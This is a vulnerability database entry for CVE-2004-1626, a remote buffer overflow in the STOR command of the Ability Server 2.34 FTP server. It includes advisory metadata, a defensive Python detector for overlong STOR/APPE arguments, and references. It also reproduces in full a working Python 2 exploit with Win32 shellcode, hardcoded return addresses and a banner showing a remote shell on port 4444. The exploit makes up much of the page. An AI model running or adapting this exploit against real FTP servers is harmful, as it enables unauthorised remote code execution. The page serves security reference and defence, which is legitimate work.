Code-Crafters Ability Server FTP STOR and APPE Parameter Remote Buffer Overflow Vulnerability

Vulnerability ID: 1108236    Vulnerability type: Buffer overflow
Published: 2004-10-21    Updated: 2005-10-20
CVE ID: CVE-2004-1626
CNNVD ID: CNNVD-200410-087
Platform: Windows    CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/588
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200410-087
|Vulnerability Details
A buffer overflow exists in Ability Server 2.34 and possibly other versions. A remote attacker can execute arbitrary code by sending an overlong argument to the STOR command.
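As an added example (not part of the advisory or of the exploit listed below), the following Python flags FTP control-channel STOR/APPE commands whose argument is far longer than any plausible filename, which is the shape of this overflow. The 255-byte threshold, the helper names and the sample session are assumptions constructed here.

```python
import re

# Commands the advisory names as affected.
VULNERABLE_CMDS = {"STOR", "APPE"}
# Assumed threshold: well under the ~970 filler bytes the public exploit
# uses, but far above any sane filename length.
MAX_ARG_LEN = 255

# verb (3-4 letters), optional whitespace, optional argument
CMD_RE = re.compile(r"^([A-Za-z]{3,4})(?:[ \t]+(.*))?$", re.S)

def parse_ftp_command(line):
    """Split one control-channel line into (VERB, argument); None if malformed."""
    m = CMD_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group(1).upper(), m.group(2) or ""

def check_command(line):
    """Return a finding dict for an overlong STOR/APPE argument, else None."""
    parsed = parse_ftp_command(line)
    if parsed is None:
        return None
    verb, arg = parsed
    if verb not in VULNERABLE_CMDS:
        return None
    arg_bytes = arg.encode("latin-1", "replace")   # FTP is byte-oriented
    if len(arg_bytes) <= MAX_ARG_LEN:
        return None
    # Raw machine code in a "filename" is a second strong signal.
    non_printable = sum(1 for b in arg_bytes if b < 0x20 or b > 0x7E)
    return {"verb": verb, "arg_len": len(arg_bytes),
            "non_printable": non_printable,
            "reason": "argument exceeds %d bytes" % MAX_ARG_LEN}

def scan_session(lines):
    """Run check_command over a captured session; return the findings."""
    return [f for f in (check_command(l) for l in lines) if f]

# Constructed sample session: benign upload/append, then an overlong STOR
# whose argument ends in two non-printable bytes.
SAMPLE_SESSION = [
    "USER ftp\r\n",
    "PASS ftp\r\n",
    "STOR report.txt\r\n",
    "appe notes.log\r\n",
    "STOR " + "A" * 1000 + "\x90\xcc" + "\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print(finding)
```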
|Vulnerability EXP
####################################################
# Ability Server 2.34 FTP STOR Buffer Overflow     #
# Advanced, secure and easy to use FTP Server.     #
# 21 Oct 2004 - muts                               #
####################################################
# D:\BO>ability-2.34-ftp-stor.py                   #
####################################################
# D:\datatools>nc -v 127.0.0.1 4444                #
# localhost [127.0.0.1] 4444 (?) open              #
# Microsoft Windows XP [Version 5.1.2600]          #
# (C) Copyright 1985-2001 Microsoft Corp.          #
# D:\Program Files\abilitywebserver>               #
####################################################

# Python 2 script (print statements, str-based byte strings).
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "###################################"

# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"

sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

# Change RET address if need be.

# Overflow string: filler up to the saved return address, the RET value
# (packed little-endian), 32 bytes of padding, then the shellcode.
#buffer = '\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4
buffer = '\x41'*970+struct.pack('<L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2

try:
    # Edit the IP, Username and Password.
    ftp = FTP('127.0.0.1')
    ftp.login('ftp','ftp')
    print "\nEvil Buffer sent..."
    print "\nSploit will hang now because I couldn't figure how to use storelines()."
    print "\nTry connecting with netcat to port 4444 on the remote machine."
except:
    print "\nCould not Connect to FTP Server."
try:
    # The overlong STOR argument is what triggers the overflow.
    ftp.transfercmd("STOR " + buffer)
except:
    print "\nDone."

# milw0rm.com [2004-10-21]
|References

Source: US-CERT Vulnerability Note: VU#857846
Name: VU#857846
Link: http://www.kb.cert.org/vuls/id/857846
Source: XF
Name: abilityftpserver-stor-dos(17823)
Link: http://xforce.iss.net/xforce/xfdb/17823
Source: BID
Name: 11508
Link: http://www.securityfocus.com/bid/11508
Source: OSVDB
Name: 11030
Link: http://www.osvdb.org/11030
Source: SECUNIA
Name: 12941
Link: http://secunia.com/advisories/12941
Source: BUGTRAQ
Name: 20041022 Ability FTP Server 2.34 Buffer Overflow Exploit
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109850947508816&w=2
